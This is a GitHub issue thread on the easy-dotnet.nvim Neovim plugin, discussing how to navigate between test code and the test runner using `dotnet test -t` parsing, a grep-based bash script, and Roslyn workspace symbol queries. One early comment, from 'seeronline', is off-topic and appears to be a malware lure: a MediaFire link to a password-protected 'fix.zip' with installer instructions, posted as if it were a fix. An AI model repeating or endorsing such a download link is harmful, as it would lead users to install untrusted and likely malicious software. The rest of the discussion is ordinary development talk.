### ISSUE TITLE
feature(testrunner):🎁 Jump back and forth from test to code

### ISSUE THREAD

**Issue by franroa** [GustavEikaas/easy-dotnet.nvim#55]
It would be really nice to be able to jump from the test's code directly to the testrunner and also the other way round.
This would be something like opening the testrunner and filter automatically the name of the test were you jumped from.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GustavEikaas** [comment]
Im not sure I follow, when navigating in the testrunner would you like a buffer to open and autojump to the test you are hovering? I was planning to add keybinding `o` on a test to jump to the buffer, thoughts?

**Comment by franroa** [comment]
Yes, I think it would be interesting to jump from the testrunner to the real test code and also from the test we could open the test runner and move the cursor to the corresponding line.
I have done something similar, but very rudimentary. I think the best way to do that is with treesitter, but I have no experience with it.

Other problem I would have to face with this is that in the testrunner I only have the information of the namespaces, not the folder where the tests are stored. I don't know if recursing the folders would have an impact on the performance

**Comment by GustavEikaas** [comment]
As of now I have no way whatsoever of finding a file reference for a file without running it. 
Would it help if this jumping was supported for failing tests? I can pretty much reliably find the filepath using the stacktrace.

**Comment by franroa** [comment]
If you are fine with quick-and-dirty solutions... you can try this:
```
dotnet test -t >testlist.txt

# Iterate over each test case
while IFS= read -r test; do
  # Extract the namespace, class, and method using regex
  if [[ $test =~ ^([a-zA-Z0-9_\.]+)\.([a-zA-Z0-9_]+)\.([a-zA-Z0-9_]+) ]]; then
    namespace="${BASH_REMATCH[1]}"
    class="${BASH_REMATCH[2]}"
    method="${BASH_REMATCH[3]}"

    # Find the corresponding file containing the class definition
    file=$(grep -rl "namespace $namespace" --include=\*.cs)

    # Print the results
    echo "Test: $test, File: $file, Class: $class, Method: $method"
  else # Flat tests
    file=$(grep -rl "$test" --include=\*.cs)
    echo "Test: $test -> File: $file"
  fi
done <tests.txt

```

When running the discovery you could parse the tests to the file, class and method. Then storing the map in a json or something like that and call that json when opening the file/test.

otherwise, what here could be done is to execute the test directly from the code and opening the testrunner and execute it. Then if it failed we can do what you mean. I think jumping from code to testrunner is easier and more important. What is your opinion?

**Comment by GustavEikaas** [comment]
The best solution would be the first you suggested, doing it during discovery and storing the paths. The only thing stopping me is finding a reliable way of doing it. After testrunner v2 is merged I will give it a shot and see how reliable i can make it

**Comment by GustavEikaas** [comment]
Im cooking something with roslyn, not sure if it ever will be feasible but using roslyn workspace analyzers i can query for symbols and most likely get accurate results for things like tests. 

There are multiple challenges with this approach but ill make a summary when im finished testing, would open up a lot of doors if it worked

![image](https://github.com/user-attachments/assets/0841f013-0ae6-463e-915d-f1df77d38a94)

**Comment by franroa** [comment]
That sounds promising
BTW, do you know this repo? https://github.com/seblj/roslyn.nvim. They are doing a great job adding implementing roslyn into nvim  Soon they will have their lsp on mason registries

**Comment by GustavEikaas** [comment]
Yep thats the repo I use for roslyn in my config. I couldnt get the original to work

**Comment by GustavEikaas** [comment]
After (ab)using roslyn I managed to get a rough version working. Using roslyn for this purpose itself is easy but enabling this functionality without imposing a lot of configuration for the user is hard. Assuming people are using https://github.com/seblj/roslyn.nvim this wont work out the box. Ill think about ways to make this feasible
https://github.com/user-attachments/assets/e037a925-33e6-44d7-a93a-ff4edd66511d

**Comment by GustavEikaas** [comment]
So basically what im doing is the following


1. Starting the lsp server manually without using vim's inbuilt lsp functions
2. Initializing the server using easy-dotnets path resolution to find sln file
3. Sending a `workspace/symbol` request to the server with the name of the testclass
4. Extracting fileUri from

**Comment by franroa** [comment]
I think it this works would be really awesome. I guess we should try a load test. 
It seems that discovering tests will be difficult not matter which decision is taken... 

A big pro, if this the case, is that it should also work with MS test, shouldn't it?

**Comment by franroa** [comment]
BTW, are you aware that the Roslyn repo allows you to setup your own executable? It's possible to start the lsp with a wrapper of roslyn

**Comment by GustavEikaas** [comment]
@franroa Im not sure I understand what you mean. Start the lsp with a wrapper of roslyn?

**Comment by GustavEikaas** [comment]
Regarding MSTest, yes but also kinda no


Workspace/symbol requests doesnt seem to have enough metadata to determine what a test is. So I could run `dotnet test -t` get the output and run a `workspace/symbol` request, then combine the results and "expand" the mstest results with namespace etc

**Comment by franroa** [comment]
There's a merge here which could be of interest. I am not sure if I understand your first contra in the summary, but this could help: https://github.com/seblj/roslyn.nvim/pull/15

**Comment by franroa** [comment]
And regarding performance.. maybe an option for loading only tests of a given module or something like that?

**Comment by GustavEikaas** [comment]
The best idea would be if roslyn.nvim supported this
- https://github.com/seblj/roslyn.nvim/issues/32

**Comment by franroa** [comment]
Really good job! I was waiting for that pr as well!

This is getting very very interesting. Have you thought about joining forces with dotnet-neotest? A team like that could be awesome

**Comment by GustavEikaas** [comment]
Ill take a look at the repo and the code when I have a time. Maybe joining forces with other dotnet vim maintainers isnt the worst idea.

**Comment by GustavEikaas** [comment]
#77 This fixes this automatically because the test output contains codeFilePath which is a direct reference to the .cs file. If that pr gets merged this will be closed
